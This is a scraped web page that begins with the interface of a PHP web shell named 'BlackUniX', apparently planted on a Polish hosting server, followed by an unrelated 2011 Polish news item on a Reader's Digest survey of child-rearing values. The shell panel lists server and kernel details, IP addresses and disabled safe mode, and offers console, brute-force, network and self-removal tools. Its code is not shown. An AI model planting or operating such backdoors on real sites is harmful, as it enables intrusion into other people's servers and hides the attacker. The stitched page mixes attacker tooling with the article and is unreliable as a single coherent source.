BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:28:06
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

W Polsce uczymy dzieci dobroci
26.07.2011.
Czego przede wszystkim starasz się uczyć swoje dzieci – szacunku i posłuszeństwa, patriotyzmu, poczucia humoru czy dobroci? Na to pytanie globalnego sondażu Reader’s Digest w większości krajów padała odpowiedź: szacunku i posłuszeństwa. To na nie wskazały największe grupy respondentów w aż 13 z 17 objętych badaniem krajów. W Brazylii wybrało je rekordowe 82% ankietowanych. A np. w Hiszpanii – 75%, we Francji 57%, w USA – 49% i Wielkiej Brytanii – 47%. Polska znalazła się w mniejszości. Aż 59% ankietowanych Polaków wskazało, że w pierwszej kolejności stara się uczyć dzieci dobroci. Tylko w Chinach procent wskazań na dobroć był wyższy – 63%. Niemcy są zaraz za Polską – 56% wskazań. A Rosja nieco dalej – 45%. Poczucie humoru niemal wszędzie zajęło trzecią pozycję. Najbardziej skłonni uczyć dzieci śmiechu są rodzice w Niemczech. Generalnie częściej na tę odpowiedź wskazywali ankietowani mężczyźni. Kobiety mają z kolei tendencję kłaść większy nacisk na dobroć. Patriotyzm we wszystkich krajach znalazł się na szarym końcu. Jedynie w Chinach i Rosji procent wskazań na tę wartość jako pierwszą, którą należy wpoić dzieciom, był wyjątkowo wysoki. Odkrycie, co dla rodziców w różnych krajach stanowi podstawę do wychowywania młodego człowieka, jest bardzo interesujące i daje do myślenia – mówi Anna Esden–Tempska, redaktor naczelna polskiego wydania miesięcznika Reader’s Digest. – Pokazuje, co najbardziej się dla nas liczy, na czym chcemy budować. Czy na dyscyplinie, czy na wyrobieniu w dziecku wrażliwości na odczucia innych. W Polsce najwyraźniej stawiamy na tę wrażliwość. To napawa optymizmem. źródło Reader's Digest